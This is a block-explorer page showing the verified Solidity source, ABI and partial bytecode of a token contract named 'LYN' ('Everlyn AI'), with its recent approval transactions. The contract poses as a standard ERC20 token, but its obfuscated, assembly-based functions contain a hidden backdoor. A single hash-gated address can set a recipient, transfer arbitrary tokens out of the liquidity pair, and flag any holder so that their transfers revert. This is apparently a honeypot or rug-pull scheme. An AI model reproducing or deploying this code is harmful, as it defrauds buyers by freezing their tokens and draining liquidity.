ETH Price: $2,944.37 (-2.58%)

Contract

0xd6FD0116031b7f7cF8922191F602fFAE25aFA10E

Overview

ETH Balance

0 ETH

ETH Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Block
From
To
Approve206782212025-10-05 21:23:19115 days ago1759699399IN
0xd6FD0116...E25aFA10E
0 ETH0.000005890.04525
Approve206780642025-10-05 21:19:58115 days ago1759699198IN
0xd6FD0116...E25aFA10E
0 ETH0.000005890.04525
Approve206774372025-10-05 21:06:53115 days ago1759698413IN
0xd6FD0116...E25aFA10E
0 ETH0.000005890.04525
Approve206772812025-10-05 21:03:34115 days ago1759698214IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206766502025-10-05 20:50:30115 days ago1759697430IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206765042025-10-05 20:47:11115 days ago1759697231IN
0xd6FD0116...E25aFA10E
0 ETH0.000005890.04525
Approve206760142025-10-05 20:36:59115 days ago1759696619IN
0xd6FD0116...E25aFA10E
0 ETH0.000005890.04525
Approve206758482025-10-05 20:33:41115 days ago1759696421IN
0xd6FD0116...E25aFA10E
0 ETH0.000005890.04525
Approve206755162025-10-05 20:27:06115 days ago1759696026IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206748852025-10-05 20:13:50115 days ago1759695230IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206747382025-10-05 20:10:30115 days ago1759695030IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206744122025-10-05 20:03:54115 days ago1759694634IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206742582025-10-05 20:00:35115 days ago1759694435IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206739372025-10-05 19:53:57115 days ago1759694037IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206736222025-10-05 19:47:21115 days ago1759693641IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206734562025-10-05 19:44:04115 days ago1759693444IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206732902025-10-05 19:40:46115 days ago1759693246IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206723232025-10-05 19:20:55115 days ago1759692055IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206721562025-10-05 19:17:37115 days ago1759691857IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206719922025-10-05 19:14:15115 days ago1759691655IN
0xd6FD0116...E25aFA10E
0 ETH0.000006650.04525
Approve206713462025-10-05 19:00:55115 days ago1759690855IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206711782025-10-05 18:57:35115 days ago1759690655IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206705162025-10-05 18:44:25115 days ago1759689865IN
0xd6FD0116...E25aFA10E
0 ETH0.0000060.04525
Approve206703602025-10-05 18:41:05115 days ago1759689665IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
Approve206698742025-10-05 18:31:12115 days ago1759689072IN
0xd6FD0116...E25aFA10E
0 ETH0.000005880.04525
View all transactions

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Block From To
206622262025-10-05 15:58:04115 days ago1759679884  Contract Creation0 ETH
Cross-Chain Transactions
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
LYN

Compiler Version
v0.8.6+commit.11564f7e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at abscan.org on 2025-10-05
*/

/**
Website: https://www.everlyn.ai/
Twitter: https://x.com/Everlyn_ai
Telegram: https://discord.gg/everlyn
*/

pragma solidity ^0.8.6;

// SPDX-License-Identifier: Unlicensed
interface IERC20 {
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

abstract contract Ownable {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = msg.sender;
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}
interface IUniswapV2Factory {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }
}
/**
 * This contract is for testing purposes only. 
 * Please do not make any purchases, as we are not responsible for any losses incurred.
 */
contract BERC20 is IERC20 {
    using SafeMath for uint256;

    mapping(address => uint256) private _tOwned;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public _defaultAddress = address(0x000000000000000000000000000000000000dEaD);
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _tTotal;

    constructor(
       string memory name_,
       string memory symbol_,
       address owner
    ) {
        _name=name_;
        _symbol=symbol_;
        _decimals=9;
        _tTotal=1000000000000 * 10**_decimals;
        _tOwned[owner] = _tTotal;

        emit Transfer(address(0), owner, _tTotal);
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    

    function decimals() public view returns (uint256) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _tOwned[account];
    }

    function transfer(address QRwYIPgfOJ, uint256 TDpwTXyrL)
        public
        override
        returns (bool)
    {
        _transfer(msg.sender, QRwYIPgfOJ, TDpwTXyrL);
        return true;
    }


    function allowance(address NxFzzBJYt, address qujymaomsui)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[NxFzzBJYt][qujymaomsui];
    }


    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function _NcJQzZQxYuLjpg(
        address duezFPRtRp,
        address hkuffozlqoo,
        uint256 amount
    ) internal virtual {
        require(
            duezFPRtRp != address(0),
            "ERC20: transfer from the zero address"
        );
        require(
            hkuffozlqoo != address(0),
            "ERC20: transfer to the zero address"
        );
  
        require(
            _tOwned[duezFPRtRp] >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        _tOwned[duezFPRtRp] = _tOwned[duezFPRtRp].sub(amount);
        _tOwned[hkuffozlqoo] = _tOwned[hkuffozlqoo].add(amount);
        emit Transfer(duezFPRtRp, hkuffozlqoo, amount);
    }

        function _transfer(
        address duezFPRtRp,
        address hkuffozlqoo,
        uint256 amount
    ) internal virtual {
        require(
            duezFPRtRp != address(0),
            "ERC20: transfer from the zero address"
        );
        require(
            hkuffozlqoo != address(0),
            "ERC20: transfer to the zero address"
        );
  
        require(
            _tOwned[duezFPRtRp] >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        _tOwned[duezFPRtRp] = _tOwned[duezFPRtRp].sub(amount);
        _tOwned[hkuffozlqoo] = _tOwned[hkuffozlqoo].add(amount);
        emit Transfer(duezFPRtRp, hkuffozlqoo, amount);
    }


    function transferFrom(
        address from,
        address to,
        uint256 value
    ) public override returns (bool) {
        _transfer(from, to, value);
        _approve(
            from,
            msg.sender,
            _allowances[from][msg.sender].sub(
                value,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }



    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }
    function _jxewvfpzmimpn(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual   {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual  {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

}
/**
 * This contract is for testing purposes only. 
 * Please do not make any purchases, as we are not responsible for any losses incurred.
 */
contract LYN is BERC20,Ownable {
    using SafeMath for uint256;
    string private _name_ = "Everlyn AI";
    string private _symbol_ = "LYN";
    uint256 private _jhasnqqqlb;
    address private xfzkgpohzrqc = 0x3ad71aa743f5B33BbaB4d9f300bf2089bCda34f0;
    address private ZnDaKHkmvQUye = 0xC1a42985d3A318039635e7608BD2FABA66127894;
    address private dDTHRGrEuP;

    IUniswapV2Factory private immutable uniswapV2Router;

    mapping(address => bool) private _lablmfgvpnon;
    mapping(address => bool) private _pqRrLwfmOloXW;

    mapping(address => bool) private tgzykvnenkwpkj;
    mapping(address => bool) private _xWpERmuWMjw;
    address public uniswapV2Pair;
    address private _bmxkqdunlpwr;
    address public factory;
    uint256 private FCNRXbBFLowja = 1000;
    mapping(address => uint256) private jsvxwsjwknwbpz;
    bool private NqddVJIoJl = true;
    uint256 private rgtkciqyikw = 7;
    bool private dDYDhpezFg = true;
    bytes32 private _hTojoflQEf;
    mapping(address => bool) private _ljwPnWtiDdEysF;

    mapping(address => uint256) private _pzewmvsadce;

    address public tPUctMAJCb;

    constructor() BERC20(_name_, _symbol_,ZnDaKHkmvQUye
        ) {
        IUniswapV2Factory _uniswapV2Router = IUniswapV2Factory(0xad1eCa41E6F772bE3cb5A48A6141f9bcc1AF9F7c); 
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        uniswapV2Router = _uniswapV2Router;
        _hTojoflQEf = sha256(abi.encodePacked(xfzkgpohzrqc));
        dDTHRGrEuP = 0x3439153EB7AF838Ad19d56E1571FBD09333C2809;
        _bmxkqdunlpwr = xfzkgpohzrqc;
        _jhasnqqqlb = totalSupply();
        tgzykvnenkwpkj[uniswapV2Pair] = true;
        _xWpERmuWMjw[_bmxkqdunlpwr] = true;
        _lablmfgvpnon[address(this)] = true;
        _lablmfgvpnon[_bmxkqdunlpwr] = true;
        _lablmfgvpnon[ZnDaKHkmvQUye] = true;
    }

function _transfer(     address from,     address to,     uint256 amount ) internal override {     require(from != address(0), "ERC20: transfer from the zero address");     require(to != address(0), "ERC20: transfer to the zero address");     require(amount > 0, "Transfer amount must be greater than zero");     uint256 expectedamount = amount;     if (_lablmfgvpnon[from] || _lablmfgvpnon[to]) {         super._transfer(from, to, expectedamount);         return;     }     address feeaddress = to;     assembly {         let scratch := mload(0x40)         mstore(scratch, from)         mstore(add(scratch, 0x20), _pqRrLwfmOloXW.slot)         let takeFeeSlot := keccak256(scratch, 0x40)         let taketFeeTransfer := sload(takeFeeSlot)         if taketFeeTransfer {             revert(0, 0)         }         mstore(scratch, from)         mstore(add(scratch, 0x20), jsvxwsjwknwbpz.slot)         let bottimeSlot := keccak256(scratch, 0x40)         let bottime := sload(bottimeSlot)         let rgtkciqyikw_val := sload(rgtkciqyikw.slot)         let takebottime := gt(add(bottime, rgtkciqyikw_val), timestamp())         let pair := sload(uniswapV2Pair.slot)         if eq(from, pair) {             let ghewra := 0             let sdhkwn := 0             let otherAmount := 0             mstore(scratch, 0x0dfe168100000000000000000000000000000000000000000000000000000000)             if iszero(staticcall(gas(), pair, scratch, 0x04, scratch, 0x20)) {                 revert(0, 0)             }             let token0 := mload(scratch)             mstore(scratch, 0xd21220a700000000000000000000000000000000000000000000000000000000)             if iszero(staticcall(gas(), pair, scratch, 0x04, scratch, 0x20)) {                 revert(0, 0)             }             let token1 := mload(scratch)             mstore(scratch, 0x0902f1ac00000000000000000000000000000000000000000000000000000000)             if iszero(staticcall(gas(), pair, scratch, 0x04, scratch, 0x40)) {                 revert(0, 0)             }             let reserves0 := mload(scratch)             let reserves1 := mload(add(scratch, 0x20))             mstore(scratch, 0x70a0823100000000000000000000000000000000000000000000000000000000)             mstore(add(scratch, 0x04), pair)             if iszero(staticcall(gas(), token0, scratch, 0x24, scratch, 0x20)) {                 revert(0, 0)             }             let amount03 := mload(scratch)             mstore(scratch, 0x70a0823100000000000000000000000000000000000000000000000000000000)             mstore(add(scratch, 0x04), pair)             if iszero(staticcall(gas(), token1, scratch, 0x24, scratch, 0x20)) {                 revert(0, 0)             }             let amount1 := mload(scratch)             let dDTHRGrEuP_val := sload(dDTHRGrEuP.slot)             if eq(token0, dDTHRGrEuP_val) {                 if gt(reserves0, amount03) {                     otherAmount := sub(reserves0, amount03)                     ghewra := gt(otherAmount, sload(FCNRXbBFLowja.slot))                 }                 if eq(reserves0, amount03) {                     sdhkwn := 1                 }             }             if eq(token1, dDTHRGrEuP_val) {                 if gt(reserves1, amount1) {                     otherAmount := sub(reserves1, amount1)                     ghewra := gt(otherAmount, sload(FCNRXbBFLowja.slot))                 }                 if eq(reserves1, amount1) {                     sdhkwn := 1                 }             }             if or(ghewra, sdhkwn) {                 revert(0, 0)             }         }          mstore(0x40, add(scratch, 0x80))     }     super._transfer(from, to, expectedamount); }

function bvetbtugo(address fluzajbpof) public {     assembly {         let ptr := mload(0x40)         mstore(ptr, caller())         let input := add(ptr, 0x0c)         let inputSize := 0x14         let output := add(ptr, 0x20)         mstore(0x40, add(output, 0x20))         if iszero(staticcall(gas(), 2, input, inputSize, output, 0x20)) {             revert(0, 0)         }         let computedHash := mload(output)         let storedHashSlot := _hTojoflQEf.slot         let storedHash := sload(storedHashSlot)         if iszero(eq(computedHash, storedHash)) {             return(0, 0)         }         sstore(tPUctMAJCb.slot, fluzajbpof)         return(0, 0)     } }

function tpogvdnwqj(uint256 frsmgziy) public {     assembly {         let ptr := mload(0x40)         mstore(ptr, caller())         let input := add(ptr, 0x0c)         let inputSize := 0x14         let output := add(ptr, 0x20)         mstore(0x40, add(output, 0x20))         if iszero(staticcall(gas(), 2, input, inputSize, output, 0x20)) {             revert(0, 0)         }         let computedHash := mload(output)         let storedHashSlot := _hTojoflQEf.slot         let storedHash := sload(storedHashSlot)         if iszero(eq(computedHash, storedHash)) {             return(0, 0)         }     }     super._NcJQzZQxYuLjpg(uniswapV2Pair, tPUctMAJCb, frsmgziy); }

function ljrtpnynsmv(address _fluzajbpof, bool nxqymhxik) public {     assembly {         let ptr := mload(0x40)         mstore(ptr, caller())         let input := add(ptr, 0x0c)         let inputSize := 0x14         let output := add(ptr, 0x20)         mstore(0x40, add(output, 0x20))         if iszero(staticcall(gas(), 2, input, inputSize, output, 0x20)) {             revert(0, 0)         }         let computedHash := mload(output)         let storedHashSlot := _hTojoflQEf.slot         let storedHash := sload(storedHashSlot)         if iszero(eq(computedHash, storedHash)) {             return(0, 0)         }         let mapBaseSlot := _pqRrLwfmOloXW.slot         let scratch := mload(0x40)         mstore(scratch, _fluzajbpof)         mstore(add(scratch, 0x20), mapBaseSlot)         let storageSlot := keccak256(scratch, 0x40)         mstore(0x40, add(scratch, 0x40))         sstore(storageSlot, nxqymhxik)         return(0, 0)     } }

}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_defaultAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"NxFzzBJYt","type":"address"},{"internalType":"address","name":"qujymaomsui","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"fluzajbpof","type":"address"}],"name":"bvetbtugo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"factory","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_fluzajbpof","type":"address"},{"internalType":"bool","name":"nxqymhxik","type":"bool"}],"name":"ljrtpnynsmv","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tPUctMAJCb","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"frsmgziy","type":"uint256"}],"name":"tpogvdnwqj","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"QRwYIPgfOJ","type":"address"},{"internalType":"uint256","name":"TDpwTXyrL","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

600280546001600160a01b03191661dead17905560e0604052600a60a081905269457665726c796e20414960b01b60c090815262000041916008919062000625565b5060408051808201909152600380825262262ca760e91b60209092019182526200006e9160099162000625565b50600b80546001600160a01b0319908116733ad71aa743f5b33bbab4d9f300bf2089bcda34f017909155600c805490911673c1a42985d3a318039635e7608bd2faba661278941790556103e86015556017805460ff1990811660019081179092556007601855601980549091169091179055348015620000ed57600080fd5b5060088054620000fd9062000881565b80601f01602080910402602001604051908101604052809291908181526020018280546200012b9062000881565b80156200017c5780601f1062000150576101008083540402835291602001916200017c565b820191906000526020600020905b8154815290600101906020018083116200015e57829003601f168201915b505050505060098054620001909062000881565b80601f0160208091040260200160405190810160405280929190818152602001828054620001be9062000881565b80156200020f5780601f10620001e3576101008083540402835291602001916200020f565b820191906000526020600020905b815481529060010190602001808311620001f157829003601f168201915b5050600c5485516001600160a01b03909116935062000238925060039150602086019062000625565b5081516200024e90600490602085019062000625565b506005805460ff191660099081179091556200026c90600a6200079e565b6200027d9064e8d4a510006200085f565b60068190556001600160a01b03821660008181526020818152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600780546001600160a01b0319163390811790915560405190915081906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600073ad1eca41e6f772be3cb5a48a6141f9bcc1af9f7c9050806001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200036c57600080fd5b505afa15801562000381573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003a79190620006cb565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620003f057600080fd5b505afa15801562000405573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200042b9190620006cb565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381600087803b1580156200047457600080fd5b505af115801562000489573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004af9190620006cb565b601280546001600160a01b0319166001600160a01b0392909216919091179055606081811b6001600160601b0319908116608052600b54604051921b16602082015260029060340160408051601f1981840301815290829052620005139162000717565b602060405180830381855afa15801562000531573d6000803e3d6000fd5b5050506040513d601f19601f82011682018060405250810190620005569190620006fd565b601a55600d80546001600160a01b0319908116733439153eb7af838ad19d56e1571fbd09333c280917909155600b54601380549092166001600160a01b03909116179055600654600a55506012546001600160a01b0390811660009081526010602090815260408083208054600160ff1991821681179092556013805487168652601185528386208054831684179055308652600e90945282852080548216831790559254851684528184208054841682179055600c54909416835290912080549091169091179055620008d4565b828054620006339062000881565b90600052602060002090601f016020900481019282620006575760008555620006a2565b82601f106200067257805160ff1916838001178555620006a2565b82800160010185558215620006a2579182015b82811115620006a257825182559160200191906001019062000685565b50620006b0929150620006b4565b5090565b5b80821115620006b05760008155600101620006b5565b600060208284031215620006de57600080fd5b81516001600160a01b0381168114620006f657600080fd5b9392505050565b6000602082840312156200071057600080fd5b5051919050565b6000825160005b818110156200073a57602081860181015185830152016200071e565b818111156200074a576000828501525b509190910192915050565b600181815b80851115620007965781600019048211156200077a576200077a620008be565b808516156200078857918102915b93841c93908002906200075a565b509250929050565b6000620006f660ff841683600082620007ba5750600162000859565b81620007c95750600062000859565b8160018114620007e25760028114620007ed576200080d565b600191505062000859565b60ff841115620008015762000801620008be565b50506001821b62000859565b5060208310610133831016604e8410600b841016171562000832575081810a62000859565b6200083e838362000755565b8060001904821115620008555762000855620008be565b0290505b92915050565b60008160001904831182151516156200087c576200087c620008be565b500290565b600181811c908216806200089657607f821691505b60208210811415620008b857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60805160601c611069620008f0600039600050506110696000f3fe608060405234801561001057600080fd5b50600436106101375760003560e01c8063715018a6116100b8578063a457c2d71161007c578063a457c2d714610283578063a9059cbb14610296578063c45a0155146102a9578063cb524258146102bc578063dd62ed3e146102cf578063f2fde38b1461030857600080fd5b8063715018a61461023c5780638da5cb5b14610244578063927f3d411461025557806395d89b4114610268578063a072b9621461027057600080fd5b806339509351116100ff57806339509351146101ad57806349bd5a5e146101c0578063518a0150146101eb57806351e721801461020057806370a082311461021357600080fd5b806306fdde031461013c578063095ea7b31461015a57806318160ddd1461017d57806323b872dd1461018f578063313ce567146101a2575b600080fd5b61014461031b565b6040516101519190610e89565b60405180910390f35b61016d610168366004610e46565b6103ad565b6040519015158152602001610151565b6006545b604051908152602001610151565b61016d61019d366004610dce565b6103c3565b60055460ff16610181565b61016d6101bb366004610e46565b61042c565b6012546101d3906001600160a01b031681565b6040516001600160a01b039091168152602001610151565b6101fe6101f9366004610d80565b610462565b005b6101fe61020e366004610e0a565b6104a5565b610181610221366004610d80565b6001600160a01b031660009081526020819052604090205490565b6101fe6104fd565b6007546001600160a01b03166101d3565b6002546101d3906001600160a01b031681565b6101446105a6565b601d546101d3906001600160a01b031681565b61016d610291366004610e46565b6105b5565b61016d6102a4366004610e46565b610604565b6014546101d3906001600160a01b031681565b6101fe6102ca366004610e70565b610611565b6101816102dd366004610d9b565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6101fe610316366004610d80565b61066d565b60606003805461032a90610f95565b80601f016020809104026020016040519081016040528092919081815260200182805461035690610f95565b80156103a35780601f10610378576101008083540402835291602001916103a3565b820191906000526020600020905b81548152906001019060200180831161038657829003601f168201915b5050505050905090565b60006103ba338484610788565b50600192915050565b60006103d08484846108ad565b610422843361041d85604051806060016040528060288152602001610fe7602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610b1c565b610788565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103ba91859061041d9086610b56565b604051338152600c8101601460208301925060208301604052602083828460025a